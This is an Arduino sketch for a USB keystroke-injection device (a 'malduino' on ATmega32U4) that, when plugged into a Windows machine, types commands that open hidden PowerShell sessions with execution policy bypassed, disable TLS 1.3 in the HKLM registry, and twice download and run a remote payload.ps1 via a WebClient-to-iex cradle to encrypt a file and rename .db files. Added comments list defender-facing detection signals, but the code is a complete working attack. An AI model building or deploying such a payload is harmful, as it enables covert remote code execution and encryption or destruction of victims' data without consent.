/*
Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
For more information see: https://github.com/pcmarcon/malduino-payload-sample
*/
#include "Keyboard.h"
#include "Mouse.h"
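// Sketch-wide settings. The two pin/timing constants were preprocessor macros;
// typed constexpr values are equivalent at every use site (pinMode, digitalWrite,
// delay) and are visible to the compiler and debugger.
// Status-LED blink half-period in milliseconds (used by loop()).
constexpr int blinkInterval = 50;
// generic USB ATMEGA32U4 hw use ledpin 13
constexpr int ledPin = 13;
// Pause in ms between consecutive typed commands in setup().
int defaultDelay = 4;
// Hold time in ms between press and release of one key in typeKey().
int defaultCharDelay = 5;
// Not referenced anywhere in this sketch; kept so the global names stay stable.
int rMin = 0;
int rMax = 100;
// Current status-LED state, toggled by loop(); the LED starts lit.
bool ledOn = true;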
// Types a single key over USB HID: press, hold for defaultCharDelay ms, release.
// `key` is handed straight to the Keyboard library (a KEY_* code or an ASCII
// value). The hold is presumably there so the host registers the press before
// the release arrives -- nothing in this sketch checks that it did.
void typeKey(int key) {
  Keyboard.press(key);
  delay(defaultCharDelay);  // hold time before the matching release
  Keyboard.release(key);
}
/*
 * setup() runs once at power-on and is the entire keystroke-injection chain of
 * this sketch: an LED preamble and a long idle, then commands typed blind over
 * USB HID into whatever Windows session is in front of the device. There is no
 * feedback from the host -- every step relies on fixed delays of a few ms to
 * a few seconds.
 *
 * What this leaves on the host, taken from the typed strings below:
 *  - Win+R -> cmd.exe -> repeated "powershell.exe -executionpolicy bypass
 *    -noprofile -windowstyle hidden" invocations with cmd as the parent process.
 *  - Writes under HKLM:\SYSTEM\...\SCHANNEL\Protocols\TLS 1.3\{Server,Client}
 *    (Enabled=0, DisabledByDefault=1) and a reg add of SystemDefaultTlsVersions=1
 *    under HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319. HKLM writes
 *    normally require an elevated token, so a non-admin session is a mitigation.
 *  - Two download-and-iex runs of a remote payload.ps1 via
 *    System.Net.WebClient, with inputs preset as $type/$file/$file_path/$show_screen.
 * Observable signals for defenders: a new HID keyboard enumerating and typing
 * at millisecond spacing, PowerShell spawned from cmd with the flag set above,
 * the SCHANNEL/.NET registry changes, and the script body itself in PowerShell
 * script block logs at iex time.
 */
void setup() {
pinMode(ledPin, OUTPUT);
// Two slow LED blinks, then a long idle so a replacement sketch can still be
// uploaded before any keystrokes are sent.
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
delay(1000);
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
delay(10000); // extra 10s to help uploading new firmware
// From here on the board presents itself to the host as a keyboard and a mouse.
// Mouse is initialised but never used in this sketch.
Keyboard.begin();
Mouse.begin();
/* ----- Begin-Payload -----*/
delay(1000); // extra 1s delay, can be adjusted if needed
// Win+R: 114 is ASCII 'r', so this opens the Run dialog.
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(114);
Keyboard.releaseAll();
delay(500);
// Start an interactive cmd.exe; all later commands are typed into it.
Keyboard.print("cmd");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(1000);
// Working directory becomes the current user's %LOCALAPPDATA%.
Keyboard.print("cd %LOCALAPPDATA%");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
// change windows registry ssl/tls settings to allow executing powershell script directly from github or other url
// Server side first: create the TLS 1.3\Server key, then set Enabled=0 and
// DisabledByDefault=1, i.e. TLS 1.3 is switched off for inbound connections.
// Each step is a separate hidden PowerShell process with execution policy bypassed.
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
// Same three steps for the TLS 1.3\Client key (outbound connections).
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
// .NET Framework 4.x is told to follow the OS default TLS versions
// (SystemDefaultTlsVersions=1), written to the 64-bit registry view.
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
delay(defaultDelay);
typeKey(KEY_RETURN);
// run encryption script directly from github
// Download cradle: WebClient.DownloadString(...) | iex fetches payload.ps1 from
// raw.githubusercontent.com and executes it in memory, never touching disk as a
// script file. Its inputs are preset as PowerShell variables; what each value
// means is defined by the remote script, not by this sketch.
// First run: $type='single_enc' on 'test.txt' under 'h:', $show_screen='no'.
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"$type='single_enc'; $file='test.txt'; $file_path='h:'; $show_screen='no'; (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/payload.ps1') | iex\"");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
// Second run of the same cradle: $type='multi_ren' on '.db' under 'h:',
// $show_screen='yes'.
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"$type='multi_ren'; $file='.db'; $file_path='h:'; $show_screen='yes'; (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/payload.ps1') | iex\"");
delay(defaultDelay);
typeKey(KEY_RETURN);
/* ----- End-Payload -----*/
// Keyboard is released; the board keeps enumerating as a HID device, and
// loop() only blinks the LED from here on.
Keyboard.end();
}
// Runs forever after setup(): flips the status LED every blinkInterval ms.
// Presumably serves as a visible "payload finished" indicator; nothing else
// happens here.
void loop() {
  const bool next = !ledOn;
  ledOn = next;
  digitalWrite(ledPin, next ? HIGH : LOW);
  delay(blinkInterval);
}